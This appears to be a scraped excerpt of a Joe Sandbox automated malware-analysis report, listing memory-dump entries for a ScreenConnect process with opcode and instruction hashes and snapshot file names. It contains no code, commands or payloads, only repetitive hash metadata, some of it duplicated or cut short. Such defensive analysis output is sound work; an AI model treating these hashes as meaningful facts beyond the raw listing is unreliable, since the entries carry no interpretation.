                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc6298c7e94a5d7451994e58ec359ea1ae76b4a65ca288e13371d7ff0ae32dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 052117B6D002499FDB24DF9AC484BDEFBF4EF88320F14846AD919A7240D378A545CFA5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4735ed9b5129e6bae3f412b684f0a4c152de4d8435e051b8e278d2e928288e37
                                                                                                                                                                                                                                                    • Instruction ID: a33a3f470be42b1d038f10b2c6ccabf1757e98709adf566382226ff738748e4a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4735ed9b5129e6bae3f412b684f0a4c152de4d8435e051b8e278d2e928288e37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F511333590010ADFCF05DFA8C9409DDBBF1EF49344B14846AD504FB261D731AA1ACB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 788c67b137834441e4f47479b4edc3e17a3560bbec71e73043717cebaa6f6469
                                                                                                                                                                                                                                                    • Instruction ID: 47d28d5eafd80f943a0306759466888141e47b14b26b1fa733cc5184734a03cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 788c67b137834441e4f47479b4edc3e17a3560bbec71e73043717cebaa6f6469
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63017C767400118B8708DA6EF89496EB3EBEBD8625354847AE609C7311CB32AC138764
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7a9c1e9911c3e07b5305947d0ccfe4c3f3ef385fe532804b05b58b454f1b6f37
                                                                                                                                                                                                                                                    • Instruction ID: 5e575f64ed461d2bfc6c06d2be8c74ca227264130ebf3b95f26cc3428d918eeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9c1e9911c3e07b5305947d0ccfe4c3f3ef385fe532804b05b58b454f1b6f37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44118E71E40205AFEB18CA6DC800AAFB7F7EFC4711F1485AAD554DB254E7729A01CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3da1dccfa2399cbb928a292824a35ea7f2998b1e83431b068a2444d3d5c4542a
                                                                                                                                                                                                                                                    • Instruction ID: 9efd8a521d434d41719cb44007b2ba6ef666fdb550da5ede3f1618237e734e93
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3da1dccfa2399cbb928a292824a35ea7f2998b1e83431b068a2444d3d5c4542a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7711CE71E40245EFEB19CB6CC8006EEBBF7AF85710B1885AAD594DB164D7729A02CB40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: df965d3c96b4b617586ac4af13f8e46f0f778e68d5e2a4a9d0f58d89c876acf2
                                                                                                                                                                                                                                                    • Instruction ID: 614cd22efcc34c66e822373e3f3bb0d51f3103976dea581d979bb21d8d936547
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df965d3c96b4b617586ac4af13f8e46f0f778e68d5e2a4a9d0f58d89c876acf2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60113070D402188FDF18DBA8D9616EDBFB1EF48310F10086AD006BB2B4DB781D42CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 28be47aef28759b2e0accae72ad5ab366fbdc2d8204d3b7e051bd359b31931cf
                                                                                                                                                                                                                                                    • Instruction ID: 40383769274bf38efe6d4be816b785a13f6d70afedcd89fdc2c96bf47f95fd86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28be47aef28759b2e0accae72ad5ab366fbdc2d8204d3b7e051bd359b31931cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211583190001EDBCB09DFACD5948ECBFB2FF85314B49C599E009AB129D736A946CB60
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: efa581823080e3913535b57af0a382f99b4cb4a206f0518fac3c0e343dc2fe9b
                                                                                                                                                                                                                                                    • Instruction ID: f24483721b598ffd11684dfe6beffb4daa41b3e07fbd822b525bf40f9afd02aa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efa581823080e3913535b57af0a382f99b4cb4a206f0518fac3c0e343dc2fe9b
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d1acf7409278802705ae3707b988a1827681a6a97731e28f0939f8558c9488c1
                                                                                                                                                                                                                                                    • Instruction ID: ff1a963f47e2dbd827a32cc47535ceaec3ddcd53be4e3aa3cfaa3de2afca7473
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1acf7409278802705ae3707b988a1827681a6a97731e28f0939f8558c9488c1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F089373002196FDF055E9898009AF3BABEBD8360B00842AF609D7251DB359C2197A5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9cd504a4dafc6678aaeffaf74c48385f5b6632e7c482d4dbb8ed7600bd4de9ab
                                                                                                                                                                                                                                                    • Instruction ID: 27eedcc6af84e505d0efdf4c05928102750a24b0b3d5a8666120717be33727cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cd504a4dafc6678aaeffaf74c48385f5b6632e7c482d4dbb8ed7600bd4de9ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDF05E317002055F9714DAADE840D5BBBEDEF886B4714863AE409CB3A4EB71EC0587A0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 500f7ce0f3d73105a2f7ca6cc6f289bcf89ef561290fa5e9b5c7355fe7912fdd
                                                                                                                                                                                                                                                    • Instruction ID: d6b6357c6252ea83f9a9edd9010b88905f673ad7aed5c5d0c60d9254822509ab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 500f7ce0f3d73105a2f7ca6cc6f289bcf89ef561290fa5e9b5c7355fe7912fdd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86F0E231780201AB8A199B9FA89092BBBDEEFC4A1034484BFE119C7310DF74FC098794
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f1b280a6a179d4eac54418002f347a13729a5f591d35cf7240fefe708790b71f
                                                                                                                                                                                                                                                    • Instruction ID: 16ae73fbdec65bdc59c63dc3af76f3778059dc77bdc75a79e4354f7e81546407
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b280a6a179d4eac54418002f347a13729a5f591d35cf7240fefe708790b71f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0242250C2D00FCB2B8778B8916993FF5EEA7200B8905DFD0818F567D758EA0AD392
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 26f93f1b280bb11cfa150d98bca759b44cec66a5b5b6ce234c4fe80cb14f335e
                                                                                                                                                                                                                                                    • Instruction ID: 69af326ce6dece164cef3dc5b0233dbb02ae995d60705c5cffd3fbccae90499a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26f93f1b280bb11cfa150d98bca759b44cec66a5b5b6ce234c4fe80cb14f335e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0C434900208EFDF48EFA8D545AACBBF9FB44745F5091A9C505AB264DB306A44CB45
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8a9d97c6c8f1bc27ff8bff4d67ef9498a77fc1b7049d78dcc101905a9ec95937
                                                                                                                                                                                                                                                    • Instruction ID: 8b0c14eb3c2a4df4e593cae11419df49167585953cc3ef7aa62e45f4cce1dc81
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a9d97c6c8f1bc27ff8bff4d67ef9498a77fc1b7049d78dcc101905a9ec95937
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0E572A0D3415FD729CB7A980558BBFDACF82228709C1FFE04CC3182E9388402C325
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d62c674ad2749a6f9700218a10c7e10362fce3d7191cd5dbb3f78339985bd265
                                                                                                                                                                                                                                                    • Instruction ID: 3edccb2b418855a0228b0e91b80e35bc8fcb3f83a03339af9f88809e948ff986
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d62c674ad2749a6f9700218a10c7e10362fce3d7191cd5dbb3f78339985bd265
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CF01730B00114CFDB19DB69C664AAABBE2EF88751704806AE805CB264EB35DD11CB80
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ab826cd1c99a9675e0580c3f3abcb36470dff10fb8f1cef1dd4e29017d1cb207
                                                                                                                                                                                                                                                    • Instruction ID: 8d77dc6d4e852c650f2036d805b944af86832507fa8d8634e4d5021c9c5d5e6d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab826cd1c99a9675e0580c3f3abcb36470dff10fb8f1cef1dd4e29017d1cb207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E06536704109AF4B08CB4ED440D6BBFAADFC9660714C06BF80DC7315DA35DD128BA4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 77400d00910e9007e487aa1187628f7613734504b1a248761a474a6d14497016
                                                                                                                                                                                                                                                    • Instruction ID: 2ab95c13f8808f9938c1d59ce016d04ef3bc756c72215027b4c30e1c518596dd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77400d00910e9007e487aa1187628f7613734504b1a248761a474a6d14497016
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF0E53A3447404FEB185EADA0D81297BD7FB8866571401BEE60EC7292CE784C068700
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1dcf1140a79c8c064e375c0dfec625111c878d62afc62deb7ef733421cbf65f7
                                                                                                                                                                                                                                                    • Instruction ID: e5e5704efca288fc1d82b18708378be96e68dc5aca5dfaa77c8ecb1d5a2385ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dcf1140a79c8c064e375c0dfec625111c878d62afc62deb7ef733421cbf65f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0CD30A08288DFCF4ADBA8D4805ACBFF2FF02340F9456D9C051AF1A2CB342A41CB41
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a7967ab921384fea5b22d98555b0c3bb90c4871c81c8da1a5709c970be7c2889
                                                                                                                                                                                                                                                    • Instruction ID: 757dacaadfec5150a82869a67c152686c2754b490582f9bb9853cbf591acbb3a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7967ab921384fea5b22d98555b0c3bb90c4871c81c8da1a5709c970be7c2889
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBE0EDB58882844FEB05DF28E8894A5BB34FF0631230106CAE80483007E7355903CB62
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 981d9e32d6b58931136930f140fe55fedbee1f0d262e32e71c0735ad8d0b834b
                                                                                                                                                                                                                                                    • Instruction ID: d9638febc8b00d171d356e1848b8af8c3b9ebc69cb2c0bd7fe755f12b2db4c24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 981d9e32d6b58931136930f140fe55fedbee1f0d262e32e71c0735ad8d0b834b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F0D471E00219DF8B44DFADC84169EFBF5EF49200B24C16AD918EB210E331AA12CFC0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f771323f6e49f006efeca97f7b2a945f0ee20ac91d26fe4a56e6a4668c8d38ae
                                                                                                                                                                                                                                                    • Instruction ID: 15b8a8f6018350513e1d881d8ec7c743e67f104ee67233d361edf2ae9eca47e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f771323f6e49f006efeca97f7b2a945f0ee20ac91d26fe4a56e6a4668c8d38ae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35E0DF363002105BAA282AAE648C52ABBDAFBC8A61B14007DF60AC3380CEB59C094390
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 44fee6a920b4bdd1c41d05f71960ac0327f59a8cc982c03c71294326f3aa0980
                                                                                                                                                                                                                                                    • Instruction ID: 08afc9b141ec5c21fae9ba3ba89fe4a23f65eb0143acd787f86e593388cdac06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44fee6a920b4bdd1c41d05f71960ac0327f59a8cc982c03c71294326f3aa0980
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04E0EDB2A082442FCB0C9BA898205ADBFE89B4B210B0854EAD08993342D93A69018384
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 53db91d589bf487baa7a80f4433888d14d8b9d9fe2bc06fbb548b270e927aa2b
                                                                                                                                                                                                                                                    • Instruction ID: bd6664c1ee3d8d5dfe63d9aa77501527da4cce9c2e4aea28cb56fdf6a0e7fdb5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53db91d589bf487baa7a80f4433888d14d8b9d9fe2bc06fbb548b270e927aa2b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FE012332001005B861D6769B50859E769DEBD525571489FED10A8B614DF769C0A8BD0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: eb5a306c90c58b235f51723c147cd3094154ad57a1e4a3f0eb34327d19f44a8b
                                                                                                                                                                                                                                                    • Instruction ID: 60324150c7ab057f9852d5bdaca6c2dcb85f802a8b926287625bb5bf21fc56e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb5a306c90c58b235f51723c147cd3094154ad57a1e4a3f0eb34327d19f44a8b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DE02632B412051BC318991BEC40957F3AEEBD9664B50047CD20CC7311CE729C828290
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5f7f6e2bd0e5336825268a88a580a522a2a69023fc6468e9229e326ec9d309d1
                                                                                                                                                                                                                                                    • Instruction ID: 4012aefbacf1d2e80c52db1b1ffa30fd418f24c27ac9a2f93e82cf4d5e9a8b50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f7f6e2bd0e5336825268a88a580a522a2a69023fc6468e9229e326ec9d309d1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43E065753052444FD7095B78A02446D7FAAEBDD363B15A0A6D505C33D5CF349C16D740
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 00cbbd88731c1a305cf08ebb71de3513eb9419902e472cb2402f62bf3fd02d9e
                                                                                                                                                                                                                                                    • Instruction ID: f11a18d21a6e672efcd81f493fddbff6ba315550f620d706f9b3033ab00c64c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00cbbd88731c1a305cf08ebb71de3513eb9419902e472cb2402f62bf3fd02d9e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D05E3A3005149F83049B4EE508C4ABFEAEFC9721305807AF609C7320CA71EC11CB94
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2c5201a4473785114aeeb0dfabaef7497aa4427763a1455d65d9cc178fc7ae82
                                                                                                                                                                                                                                                    • Instruction ID: 933337b673302e4ec11ea5aa8a9237ed445890eaab044f5e6e70031c0ab81469
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c5201a4473785114aeeb0dfabaef7497aa4427763a1455d65d9cc178fc7ae82
